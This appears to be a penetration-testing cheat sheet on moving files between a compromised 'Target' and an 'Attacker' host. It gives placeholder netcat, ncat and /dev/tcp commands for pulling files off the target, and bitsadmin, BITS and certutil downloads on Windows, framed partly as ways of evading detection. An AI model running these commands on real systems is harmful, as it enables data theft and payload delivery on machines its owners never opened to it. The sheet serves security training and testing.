Miscellaneous

The different applications/tools can also be used for file transfer (also useful for Evading Detection).

Linux

+file download +file upload

GTFOBins

Windows

/download /upload

LOLBAS

Netcat

File transfer from Target to Attacker

Listening on Attacker

Attacker:

nc -l -p <PORT> > <NEW_NAME>

Target:

nc -q 0 <IP> <PORT> < <FILE>

Listening on Target

Target:

nc -l -p <PORT> -q 0 < <FILE>

Attacker:

nc <IP> <PORT> > <NEW_NAME>

cat < /dev/tcp/<IP>/<PORT> > <NEW_NAME>

Ncat

File transfer from Target to Attacker

Listening on Attacker

Attacker:

ncat -l -p <PORT> --recv-only > <NEW_NAME>

Target:

ncat --send-only <IP> <PORT> < <FILE>

Listening on Target

Target:

ncat -l -p <PORT> --send-only < <FILE>

Attacker:

ncat <IP> <PORT> --recv-only > <NEW_NAME>

cat < /dev/tcp/<IP>/<PORT> > <NEW_NAME>

bitsadmin

Downloading files on Windows.

bitsadmin /transfer wcb /priority foreground http://<IP>:<PORT>/<FILE> <NEW_NAME>

BITS

Allows downloading and uploading files on Windows.

Import-Module bitstransfer; Start-BitsTransfer -Source "http://<IP>:<PORT>/<FILE>" -Destination "<NEW_NAME>"

For the upload try to reverse the source and destination arguments, setting a Server Python3 with Upload Option (and self-signed certificate).

certutil

Downloading files on Windows.

certutil.exe -verifyctl -split -f http://<IP>:<PORT>/<FILE>